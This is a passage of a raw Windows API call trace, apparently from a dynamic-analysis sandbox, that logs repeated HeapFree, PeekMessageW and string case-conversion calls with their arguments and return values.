[0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.617] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.617] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.617] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.617] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.617] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.618] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.618] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.618] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.618] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.618] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.618] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.619] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.619] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.620] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.620] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.620] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.620] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.620] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.620] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.620] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.621] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.621] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.622] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.622] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.622] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.622] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.622] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e2c48 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: 